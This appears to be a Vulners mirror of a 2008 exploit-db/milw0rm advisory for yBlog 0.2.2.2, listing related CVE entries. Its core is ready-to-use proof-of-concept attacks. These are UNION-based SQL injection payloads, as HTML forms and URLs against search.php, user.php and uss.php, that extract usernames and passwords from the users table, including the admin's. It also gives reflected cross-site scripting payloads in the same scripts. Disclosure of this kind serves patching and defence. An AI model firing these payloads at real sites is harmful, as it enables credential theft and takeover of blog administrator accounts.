Lucene search
+L

Yblog 0.2.2.2 - Cross-Site Scripting / SQL Injection

🗓️ 10 Jun 2008 00:00:00Reported by UnohopeType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 43 Views

yBlog 0.2.2.2 Multiple Remote Vulnerabilities including Cross-Site Scripting (XSS) and SQL Injectio

Related
Code
ReporterTitlePublishedViews
Family
circl
Circl
CVE-2008-2668
10 Jun 200800:00
circl
circl
Circl
CVE-2008-2669
10 Jun 200800:00
circl
cve
CVE
CVE-2008-2668
12 Jun 200801:30
cve
cve
CVE
CVE-2008-2669
12 Jun 200801:30
cve
cvelist
Cvelist
CVE-2008-2668
12 Jun 200801:30
cvelist
cvelist
Cvelist
CVE-2008-2669
12 Jun 200801:30
cvelist
euvd
EUVD
EUVD-2008-2663
7 Oct 202500:30
euvd
euvd
EUVD
EUVD-2008-2664
7 Oct 202500:30
euvd
nvd
NVD
CVE-2008-2668
12 Jun 200802:32
nvd
nvd
NVD
CVE-2008-2669
12 Jun 200802:32
nvd
Rows per page
  _____ _   _ _____  _____ _____ _____
 /  ___| |_| |  _  \|  _  |  _  |_   _|
 | (___|  _  | [_)_/| (_) | (_) | | |
 \_____|_| |_|_| |_||_____|_____| |_|
        C. H. R. O. O. T.  SECURITY  GROUP
        - -- ----- --- -- -- ---- --- -- -
                     http://www.chroot.org

                          _   _ _ _____ ____ ____ __  _
        Hacks In Taiwan  | |_| | |_   _|  __|    |  \| |
        Conference 2008  |  _  | | | | | (__| () |     |
                         |_| |_|_| |_| \____|____|_|\__|
                                      http://www.hitcon.org


Title =======:: yBlog 0.2.2.2 Multiple Remote Vulnerabilities

Author ======:: unohope [at] chroot [dot] org

IRC =========:: irc.chroot.org #chroot

ScriptName ==:: yBlog

Download ====:: http://nchc.dl.sourceforge.net/sourceforge/y-blog/yblog-0.2.2.2.tar.gz

Mirror ======:: http://www.badongo.com/file/9705849

______________________
[SQL Injection]

- {search.php} -

<form action="http://localhost/yblog/search.php" method="post">
  <input type="hidden" name="q" value="' union select 0,1,2,3,usuario,5,6,7,8,9,10,password,12,13,14,15,16 from usuarios/*">
  <input type="submit" value="send">
</form>

<form action="http://localhost/yblog/search.php" method="post">
  <input type="hidden" name="cn" value="1">
  <input type="hidden" name="q" value="' union select 0,1,2,3,usuario,5,6,7,8,9,10,password,12,13,14,15,16 from usuarios/*">
  <input type="submit" value="send">
</form>

- {user.php} -

http://localhost/yblog/user.php?n=-99'+union+select+0,1,2,3,usuario,password,6,7,8,9,10,11,12,13,14,15,16+from+usuarios/*

- {uss.php} -

http://localhost/yblog/uss.php?action=2&done=1&n=-99'+union+select+0,1,2,usuario,password,5,6,7,8,9,10,11,12,13,14,15,16+from+usuarios+where+usuario='adm'/*

______________________
[Cross-Site Scripting]

- {search.php} -

<form action="http://localhost/yblog/search.php" method="post">
  <input type="hidden" name="q" value="<script>alert(/xss/)</script>">
  <input type="submit" value="send">
</form>

- {user.php} -

http://localhost/yblog/user.php?n=<script>alert(/xss/)</script>

- {uss.php} -

http://localhost/yblog/uss.php?action=2&done=1&n=<script>alert(/xss/)</script>

______
[NOTE]

!! This is just for educational purposes, DO NOT use for illegal. !!

# milw0rm.com [2008-06-10]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation